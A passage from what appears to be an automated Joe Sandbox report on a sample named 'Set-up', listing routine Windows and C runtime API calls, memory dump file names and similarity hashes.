                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _callnewh$AllocateHeap_errno
                                                                                              • String ID:
                                                                                              • API String ID: 4160251224-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::$Decorator::getThisType
                                                                                              • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                              • API String ID: 1425277612-3028518216

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA3F9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA402
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA408
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA420
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA42E
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6BB9BFE9), ref: 6BBAA447
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA44A
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA450
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6BB9BFE9), ref: 6BBAA470
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA473
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA48D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA490
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6BB9BFE9), ref: 6BBAA4AA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4AD
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6BB9BFE9), ref: 6BBAA4C7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4CA
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA4E4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4E7
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6BB9BFE9), ref: 6BBAA505
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA508
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA526
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA529
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA547
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA54A
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA568
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA56B
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA589
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA58C
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6BB9BFE9), ref: 6BBAA5AA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5AD
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6BB9BFE9), ref: 6BBAA5CB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5CE
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA5EC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5EF
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6BB9BFE9), ref: 6BBAA60D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA610
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA62E
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA631
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                                                                              • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                                                                              • API String ID: 1483908321-2643937717

                                                                                              APIs
                                                                                              • _getptd.MSVCR100(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67278
                                                                                              • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB672CC
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6731E
                                                                                              • IsValidLocale.KERNEL32(?,00000001,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67331
                                                                                              • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6737B
                                                                                              • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6BB6738F
                                                                                              • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6BB673A0
                                                                                              • _TranslateName.LIBCMT ref: 6BB917C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
                                                                                              • String ID: Norwegian-Nynorsk$kCHT$kDES$kENA$kENA$kENB$kENC$kENC$kENI$kENL$kENU$kENU$kENU$kENU$kENU$kESC$kESO$kESU$kESV$kFRB$kFRC$kGBR$kKOR$kNLB$kNLB$kSVF$kSVK$kTTO$kUSA$kUSA$kZAF
                                                                                              • API String ID: 3958957854-1521886187

                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6BB9BE5C
                                                                                              • _memset.LIBCMT(?,00000000,00000114), ref: 6BB9BE85
                                                                                              • GetVersionExW.KERNEL32(?), ref: 6BB9BE96
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C07B
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C082
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C097
                                                                                              • malloc.MSVCR100 ref: 6BB9C0B0
                                                                                              • std::exception::exception.LIBCMT ref: 6BB9C0D2
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C0F5
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C10A
                                                                                              • free.MSVCR100(?), ref: 6BB9C178
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C1A4
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C1AB
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C1BD
                                                                                              • malloc.MSVCR100 ref: 6BB9C1D6
                                                                                              • std::exception::exception.LIBCMT ref: 6BB9C1F8
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C21E
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C230
                                                                                              • free.MSVCR100(?), ref: 6BB9C2BB
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BEAA
                                                                                                • Part of subcall function 6BB980CA: std::exception::exception.LIBCMT(6BB9C2E6,00000114,?), ref: 6BB980DE
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BEB9
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6BB9BEFE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BF05
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BF17
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BF30
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BF4D
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6BBFFEB4,00000000), ref: 6BB9C02D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9C034
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C040
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C059
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9C2E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error$Concurrency::unsupported_os::unsupported_osstd::exception::exception$AddressHandleModuleProcfreemalloc$ExceptionInfoSystemThrowVersion_memset
                                                                                              • String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
                                                                                              • API String ID: 1988720266-1310109495
                                                                                              • Opcode ID: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
                                                                                              • Instruction ID: 64f03b279837099059cbf18caad96cab1bf2ab195c57c6f041f11bb1a5368312
                                                                                              • Opcode Fuzzy Hash: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
                                                                                              • Instruction Fuzzy Hash: A2C1CF716086C19FD714EF69E881A5A77F8EB8B750F11487EE044D2140D73ECB49EBA2

                                                                                              APIs
                                                                                              • _wcspbrk.LIBCMT(?,6BB77D1C), ref: 6BB781E3
                                                                                              • _getdrive.MSVCR100 ref: 6BB781FD
                                                                                                • Part of subcall function 6BB780BC: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6BB78214
                                                                                              • _wcspbrk.LIBCMT(?,./\), ref: 6BB78235
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7816A
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB78171
                                                                                                • Part of subcall function 6BB78163: _wfullpath.MSVCR100(?,?,?), ref: 6BB78182
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7818C
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB78263
                                                                                              • _errno.MSVCR100 ref: 6BB7828B
                                                                                              • __doserrno.MSVCR100 ref: 6BB78295
                                                                                              • __doserrno.MSVCR100 ref: 6BB87CB4
                                                                                              • _errno.MSVCR100 ref: 6BB87CBB
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87CC6
                                                                                              • towlower.MSVCR100(00000000), ref: 6BB87CE3
                                                                                              • GetDriveTypeW.KERNEL32(00000000), ref: 6BB87CF5
                                                                                              • free.MSVCR100(?), ref: 6BB87D12
                                                                                              • ___loctotime64_t.LIBCMT ref: 6BB87D45
                                                                                              • free.MSVCR100(?), ref: 6BB87D72
                                                                                                • Part of subcall function 6BB7813D: _wcslen.LIBCMT(00000000,6BB78277), ref: 6BB78140
                                                                                              • __wsopen_s.LIBCMT(000000FF,?,00000000,00000040,00000000), ref: 6BB87DA8
                                                                                              • __fstat64i32.LIBCMT(000000FF,?), ref: 6BB87DCC
                                                                                              • _close.MSVCR100(000000FF,000000FF,?), ref: 6BB87DD9
                                                                                              • FindClose.KERNEL32(?), ref: 6BB87FAA
                                                                                              • ___wdtoxmode.LIBCMT ref: 6BB87FB7
                                                                                              • GetLastError.KERNEL32 ref: 6BB88009
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB88010
                                                                                              • FindClose.KERNEL32(?), ref: 6BB8801C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32__wsopen_s_close_getdrive_invalid_parameter_noinfo_wfullpathtowlower
                                                                                              • String ID: ./\
                                                                                              • API String ID: 2703246364-3176372042
                                                                                              • Opcode ID: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
                                                                                              • Instruction ID: 132b4d04f55bfac546b7a5c9274a811957013071c4a06bf99c8dee5dca80e061
                                                                                              • Opcode Fuzzy Hash: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
                                                                                              • Instruction Fuzzy Hash: 1DC154B19045A9EEDB609F76CC44AA9B7B8FF09315F0401EAE65CE3140E7789E80CF65

                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000007,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB7631E
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • __tzname.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76327
                                                                                              • _get_timezone.MSVCR100(?,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76333
                                                                                              • _get_daylight.MSVCR100(6BB7693D,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76345
                                                                                              • _get_dstbias.MSVCR100(00000008,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76357
                                                                                              • ___lc_codepage_func.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76365
                                                                                                • Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72232
                                                                                                • Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72241
                                                                                                • Part of subcall function 6BB72214: __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D
                                                                                              • GetTimeZoneInformation.KERNEL32(6BC04DF0,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB763AC
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,6BC04DF4,00000000,?,0000003F,00000000,?), ref: 6BB7642A
                                                                                              • WideCharToMultiByte.KERNEL32(000000FF,00000000,6BC04E48,000000FF,?,0000003F,00000000,?), ref: 6BB7645D
                                                                                              • __timezone.MSVCR100 ref: 6BB76483
                                                                                              • __daylight.MSVCR100 ref: 6BB7648D
                                                                                              • __dstbias.MSVCR100 ref: 6BB76497
                                                                                              • strcmp.MSVCR100(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899C9
                                                                                              • free.MSVCR100(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E2
                                                                                              • _strlen.LIBCMT(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E9
                                                                                              • _malloc_crt.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899F0
                                                                                              • _strlen.LIBCMT(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A06
                                                                                              • strcpy_s.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A14
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A29
                                                                                              • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A2F
                                                                                              • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6BB89A4A
                                                                                              • atol.MSVCR100(-00000003), ref: 6BB89A67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3174396702-0
                                                                                              • Opcode ID: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
                                                                                              • Instruction ID: ec4b9a8d4998f608dddc025c1be430874f5ebbea288f22d6ac27984bcc41f6b8
                                                                                              • Opcode Fuzzy Hash: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
                                                                                              • Instruction Fuzzy Hash: DD91E271C042859FDF10AFB9C88199DBBF9FF1A314B60107AE1A1A7291E77D8E41CB64
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6BB67435
                                                                                              • free.MSVCR100(?,?,?,00000000), ref: 6BB67456
                                                                                              • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB6763F
                                                                                              • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6BB67659
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                              • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              • free.MSVCR100(00000000), ref: 6BB906E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2432546303-0
                                                                                              • Opcode ID: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
                                                                                              • Instruction ID: 8d8cfa0ce0a977ebbcc559ff85802e010ce632a13a9b61a6fdf5007213c577a5
                                                                                              • Opcode Fuzzy Hash: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
                                                                                              • Instruction Fuzzy Hash: 6E51BE7290029AABEB109F668C45BAF3BB8EF05794F1044A5FD1892140FBB9CD64DF61
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB673D5
                                                                                              • strcmp.MSVCR100(00000000,ACP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB72C1C
                                                                                              • strcmp.MSVCR100(00000000,OCP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB9176C
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB91785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              APIs
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB6A3A2
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB91272
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB9129B
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB912B8
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB91321
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9132B
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9133C
                                                                                              APIs
                                                                                              • wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6BB644B2
                                                                                              • wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6BB644D9
                                                                                              • wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB6452E
                                                                                              • wcsncpy_s.MSVCR100(?,?,?,?), ref: 6BB64562
                                                                                              • _errno.MSVCR100 ref: 6BB913A1
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB913AB
                                                                                              • _errno.MSVCR100 ref: 6BB913BC
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BBDC14C
                                                                                              • _crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC159
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBDC161
                                                                                              • UnhandledExceptionFilter.KERNEL32(6BBDC198), ref: 6BBDC16C
                                                                                              • _crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC17D
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6BBDC188
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6BBDC18F
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6BB6753C
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6BB6758E
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6BB675AC
                                                                                              • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6BB675B5
                                                                                              • malloc.MSVCR100(00000008,?,?,00000000), ref: 6BB91418
                                                                                              APIs
                                                                                              • _errno.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878BE
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878C8
                                                                                              • _errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878D4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878DE
                                                                                              • _errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878EA
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000), ref: 6BB6997A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6BB69985
                                                                                              APIs
